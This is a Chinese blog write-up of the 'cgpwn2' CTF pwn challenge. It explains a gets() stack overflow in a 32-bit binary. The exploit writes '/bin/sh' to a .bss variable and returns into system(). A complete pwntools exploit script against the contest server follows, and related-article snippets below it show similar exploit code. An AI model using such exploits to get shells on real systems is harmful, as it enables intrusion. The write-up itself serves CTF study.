cgpwn2---writeup

最新推荐文章于 2024-03-16 11:42:38 发布
最新推荐文章于 2024-03-16 11:42:38 发布
阅读量460 收藏 4
点赞数 21
分类专栏: CTF-PWN # 攻防世界-pwn -- WriteUp 文章标签: CTF PWN ROP 栈溢出 攻防世界
本文为ATFWUS原创,允许转载,但请附上作者署名和本文链接
本文链接:https://blog.csdn.net/ATFWUS/article/details/104587895
版权

文件下载地址:

链接:https://pan.baidu.com/s/1MjaJM7ThNQewgIkpFKl3cg
提取码:v4l7 

0x01.分析

checksec:

32位程序,仅开启NX。

查看源码:

大概理清一下流程,首先会输出字符串,然后要求输入一个字符串,放到name里面,然后返回的时候,再此要求出入字符串,然后再输出一句话后程序结束。

发现高危函数:gets。继续寻找,是否存在system调用。

果然存在,找到地址:

system的地址为:0x08048420

不过仔细查看一下system的具体调用,发现:

没有/bin/sh,所以我们要替换这个字符串,回到hello()函数,继续观察一些变量:

发现将我们的输入写入name变量,前面没有,所以一定是个全局变量,查看详情:

发现是位于bss段,于是顿时有了思路:

第一次输入先把/bin/sh写入name里面,第二次输入再利用溢出,跳转到system处,将name作为参数,得到shell。

确定一下溢出量:(第二次输入才开始确定偏移量)

 

0x02.exp

##!/usr/bin/env python
from pwn import*

#r=process('./cgpwn2')
r=remote("111.198.29.45",32269)

system_adr=0x08048420
name_adr=0x0804A080

payload=42*'A'+p32(system_adr)+p32(0x0)+p32(name_adr)

r.recvuntil("please tell me your name")
r.sendline("/bin/sh")
r.recvuntil("hello,you can leave some message here:")
r.sendline(payload)
r.interactive()

 

ATFWUS
关注
  • 21
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
cgpwn2(xctf)
weixin_43868725的博客
05-06 349
0x0 程序保护和流程 保护: 流程: main() hello() 可以发现在hello()中存在栈溢出。 0x1 利用过程 在函数窗口中发现了system()函数,所以我们只需要字符串"/bin/sh"。就可以getshell了。仔细观察程序可以发现name变量是全局变量存放在.bss段中。 所以我们只需要向name中输入"/bin/sh",s=‘a’*(0x26+4)+p32(sys...
攻防世界PWN新手练习区——cgpwn2
smsyz2019的博客
09-23 299
攻防世界PWN新手练习区——cgpwn2 首先检查文件的有哪些保护 checksec cgpwn2 32位程序 用IDA反编译文件 main函数中只有hello函数,点击查看
BJDCTF-writeup
01-20
本篇文章为个人做题时的部分wp,如有错误,请联系我更正。 目录杂项最简单的misc-y1ngA_Beautiful_Picture小姐姐-y1ngEasyBaBa圣火昭昭-y1ngTARGZ-y1ngReal_EasyBaBa总结 杂项 最简单的misc-y1ng 题目是一个zip包,尝试解压出错,用AZR压缩包修复工具修复后,解压得到一个secret文件,由于没有后缀名,放入010editor查看,发现含有IHDR 可能是缺少文件头,加上png的文件头89504E47后成功打开图片。发现424A44…等一列数字,猜测是十六进制,在线网站解密得到flag。附上网站:十六进制转文本 A_Bea
Systems-Administration-Writeup
04-02
系统管理-课程撰写 内容 ---- ---正则 -- - - ---- ---- -
memory-surprisal-writeup
04-05
内存意外写入
writeup-开源
05-13
用于将源文档转换为HTML或XML的编程语言。 Writeup是标记语言(类似于markdown)和宏预处理语言的组合,该宏语言可以为文档建立正式的生产系统。
HITCON-Training-Writeup:https的简要说明
04-29
HITCON培训 我为做了简短的 有关Linux二进制开发的信息,请参见。 环境设定 git clone https://github.com/scwuaptx/HITCON-Training.git ~/ cd HITCON-Training && chmod u+x ./env_setup.sh && ./env_setup.sh 大纲 基础知识 介绍 逆向工程 静态分析 动态分析 开发 有用的工具 IDA PRO 广发银行 Pwntool 实验1-sysmagic 部分 编译,链接,组装 执行 程序如何运行 部分 x86组装 通话约定 实验2-打开/读取/写入 外壳编码 堆栈溢出 缓冲区溢出 返回文本/ Shellcode 实验3-ret2shellcode 保护ASLR / DEP / PIE / StackGuard 延迟绑定 返回图书馆实验4-ret2lib 面向返
cgpwn2 [XCTF-PWN]CTF writeup系列10
重新启程
12-20 492
题目地址:cgpwn2 先看看题目内容: 照例检查一下保护机制 root@mypwn:/ctf/work/python# checksec 330890cb0975439295262dd46dac13b9 [*] '/ctf/work/python/330890cb0975439295262dd46dac13b9' Arch: i386-32-little R...
XCTF-pwn-cgpwn2 - Writeup
菜小狗.的博客
08-13 6716
虽然现在做的pwn题虽然很简单,但是已经慢慢的开始对解pwn题的过程有一些基础的思路了。 首先惯例流程走一遍: 丢到ida 瞅一眼 有看到system但是没有看到/bin/sh 查看hello的伪代码发现一些有趣的东西: 在这儿看到了gets()函数,这说明可能在这儿存在溢出漏洞。 同时点开上面的name,发现name固定的全局变量bss段 因而我们可以将/bin/sh构造进这个地址当中。...
cgpwn2 writeup
ditto的博客
01-07 1696
拿到题目检查防护: 简单运行下: 放到ida里看下: hello函数的代码如下: char *hello() { char *v0; // eax signed int v1; // ebx unsigned int v2; // ecx char *v3; // eax char s; // [esp+12h] [ebp-26h] int v6; // [esp+1...
滑块验证码
最新发布
weixin_45580774的博客
03-16 1234
1.这里针对滑块验证给了一个封装的组件verifition,使用直接可以调用 2.组件目录 3.每个文件的内容 3.1 Api文件中只有一个index.js文件,用来存放获取滑块和校验滑块结果的api import request from '@/router/axios' //获取验证图片 export function reqGet(data) { return request({ url: '/code', method: 'get', data }) } //滑
Java集成openCV实现图片背景切换
AnNanDu的博客
01-05 13万+
下载openCV 官网地址:Releases - OpenCV 下载地址:Download OpenCV from SourceForge.net 这里我用的opencv440的windows版本 下载完成后点击exe进行安装,安装完成后会生成opencv文件夹,里面有各个环境文件 boot 示例 1.在opencv\build\java\以及opencv\build\java\x64下提取jar包以及动态库。 2.在resources下创建lib/opencv文件夹,并将..
Python实现定时发邮件
热门推荐
余香
05-01 17万+
1. STMP简介 smtp协议即简单邮件传输协议,而在Python的smtplib库对smtp协议进行了封装,对于用户很友好,关于smtplib库的详细介绍可以看官方的文档。 2. QQ邮箱授权码的获取 登陆网页版qq邮箱,在帐户那里可以开启qq邮箱的服务,然后点击授权码,在输入QQ安全中心(手机令牌)显示的动态密码,这样子就可以生成QQ邮箱的授权码了。 3. SMTP 端口号 端口25: s...
运输计划 洛谷P2680
Flowers
10-28 8万+
题目链接 题目描述 公元\(2044\) 年,人类进入了宇宙纪元。 L 国有 \(n\) 个星球,还有 \(n-1\) 条双向航道,每条航道建立在两个星球之间,这 \(n-1\) 条航道连通了 \(L\) 国的所有星球。 小 P 掌管一家物流公司, 该公司有很多个运输计划,每个运输计划形如:有一艘物流飞船需要从 \(u_i\) 号星球沿最快的宇航路径飞行到 \(v_i\) 号星球去。显然,飞船驶...
2019.7.17 功放世界 cgpwn2
DSR446的博客
07-17 304
以下是该题的脚本: # -*- coding:utf-8 -*- from pwn import * elf=ELF('./cgpwn2') p = remote('111.198.29.45',47681) addr=0x804A080 #点击name,获得name的地址。 p.recvline() p.sendline('/bin...
NJUPT-CGCTF pwn2 StackOverflow [Writeup]
cossack9989的博客
12-30 2056
最近肥肠地想入门一下pwn,找了道题试了一下。 题目网址:StackOverflow 栈溢出啊。。虽然我水平很菜。。还是觉得挺有意思的 不扯了,先看题。 扔到32位IDA里面看看,观察一下,发现有两个很关键的函数message与pwnme,很显然message可以用来栈溢出pwnme可以用来调用system函数,但是Alt+T之后并没有发现‘/bin/sh’,也没有提供libc.so,这
栈帧(Stack Frame)
ATFWUS的博客
02-27 4万+
0x01.栈在计算机中的应用 在计算机系统中,栈也可以称之为栈内存是一个具有动态内存区域,存储函数内部(包括main函数)的局部变量和方法调用和函数参数值,是由系统自动分配的,一般速度较快;存储地址是连续且存在有限栈容量,会出现溢出现象,程序可以将数据压入栈中,也可以将数据从栈顶弹出。压栈操作使得栈增大,而弹出操作使栈减小。 栈用于维护函数调用的上下文,离开了栈,函数调用就没法实现。 栈是从...
栈溢出的几种保护机制
ATFWUS的博客
02-28 2万+
Stack Protector(栈保护) 也称 cannary。 说明:当启用栈保护后,函数开始执行的时候会先往栈里插入cookie信息,当函数真正返回的时候会验证cookie信息是否合法,如果不合法就停止程序运行。攻击者在覆盖返回地址的时候往往也会将cookie信息给覆盖掉,导致栈保护检查失败而阻止shellcode的执行。在Linux中我们将cookie信息称为canary。 canary...
整型溢出漏洞
ATFWUS的博客
03-02 2万+
目录 0x01.整型在计算机系统中的相关知识 0x02. 上界溢出和下界溢出 上界溢出: 下界溢出: 0x03.漏洞利用 0x01.整型在计算机系统中的相关知识 在计算机中,整数类型分为无符号整数和有符号整数 两种。 有符号整数会在最高位用0表示正数,1表示负 数,而无符号整数则没有这种规则。因为计算机只认得二进制,认不得符号。 无符号的汇编代码是对内存进行加法运算. 在计算机...
oscp 2023 challenge writeup-medtech-csdn博客
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ATFWUS

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值